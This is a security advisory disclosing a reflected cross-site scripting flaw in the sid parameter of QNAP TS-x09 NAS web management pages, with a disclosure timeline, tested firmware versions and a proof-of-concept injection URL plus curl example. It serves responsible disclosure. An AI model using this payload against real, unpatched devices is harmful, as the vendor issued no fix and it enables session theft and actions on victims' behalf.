QNAP TS-x09 Turbo NAS Cross Site Scripting

`On the 7th of July 2015 I discovered a reflected cross-site scripting  
(XSS) vulnerability in QNAP TS-x09 Network Attached Storage devices.  
Full disclosure was undertaken with the vendor and a CVE-ID has been  
requested from Mitre.  
  
CVE-ID: requested via PGP email  
  
7th July 2015  
Author: Mark Cross  
Twitter: @xerubus  
WWW: www.mogozobo.com  
Reference: http://www.mogozobo.com/?p=2574  
  
====================  
Summary  
====================  
  
A reflected Cross-Site scripting vulnerability was found in QNAP  
TS-109/209/409/409U Turbo NAS devices, including Standard, II, PRO and  
PRO-II models running <= Version 3.3.3 Build 1003T. A vulnerability in  
the sid variable in cgi-bin/user_index.cgi and cgi-bin/index.cgi  
allows a remote unauthenticated attacker to inject arbitrary  
JavaScript which is executed server-side by escaping from the  
quotation marks.  
  
====================  
Disclosure Timeline  
====================  
  
07 July 2015  
– Requested PGP from vendor via website for secure communications.  
– Requested CVE identifier from MITRE via PGP.  
  
08 July 2015  
– Received email from vendor with security contact and PGP key.  
– Received email from Mitre requesting further information.  
– Emailed vendor full vulnerability details via PGP email  
– Emailed further details to Mitre as requested.  
  
10 July 2015  
– Emailed security contact for confirmation of receipt of previous email  
  
13 July 2015  
– Requested acceptance and mutually agreeable disclosure period  
  
21 July 2015  
– Vendor advised they will not be releasing a new firmware.  
– Advised vendor public disclosure date will be Friday 24th July 2015  
  
24 July 2015  
– Provided MITRE will full vulnerability details  
– Advised MITRE that vendor will not be patching vulnerability  
– Re-requested CVE-IDs be released  
- Vulnerability published on mogozobo.com  
- Vulnerability publicly disclosed via Full Disclosure mailing list.  
  
  
====================  
Status  
====================  
  
Published  
  
====================  
Tested versions  
====================  
  
This vulnerability was tested on the following QNAP devices:  
  
– TS-109 PRO and TS-109 II Version 3.3.0 Build 0924T  
– TS-209 and TS-209 PRO II Version 3.3.3 Build 1003T  
– TS-409 and TS-409U Version 3.3.2 Build 0918T  
  
====================  
Details  
====================  
  
The QNAP NAS Management Software, embedded as firmware, is accessible  
via a web-based interface on all Turbo NAS devices. A vulnerability in  
the sid variables in cgi-bin/user_index.cgi and cgi-bin/index.cgi  
allows a remote unauthenticated attacker to inject arbitrary  
JavaScript which is executed server-side by escaping from the  
quotation marks.  
  
An attacker may exploit the reflected XSS vulnerability to cause a  
victim to execute the malicious JavaScript code within the user’s  
browser. The malicious code can perform, but is not limited to,  
stealing a victim’s session token or login credentials, log the  
victim’s keystrokes, or perform arbitrary actions on the victim’s  
behalf.  
  
====================  
Vulnerable URLs:  
====================  
  
http://target:8080/cgi-bin/user_index.cgi  
http://target:8080/cgi-bin/index.cgi  
  
====================  
XSS Proof-of-concept (POC)  
====================  
  
The following proof-of-concept (POC) demonstrates the injection:  
  
http://target:8080/cgi-bin/user_index.cgi?sid=%22%3balert%28%22XSS%22%29%2f%2f  
http://target:8080/cgi-bin/index.cgi?sid=%22%3balert%28%22XSS%22%29%2f%2f  
  
# Example  
  
$ curl -A "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101  
Firefox/31.0 Iceweasel/31.8.0"  
'http://<redacted>:8080/cgi-bin/user_index.cgi?sid=";alert("XSS")//'  
-s | grep XSS  
  
var sid = "";alert("XSS")//";  
  
====================  
Vulnerability solution  
====================  
  
QNAP have advised that they will not release a new firmware to address  
the vulnerabilities.  
  
  
`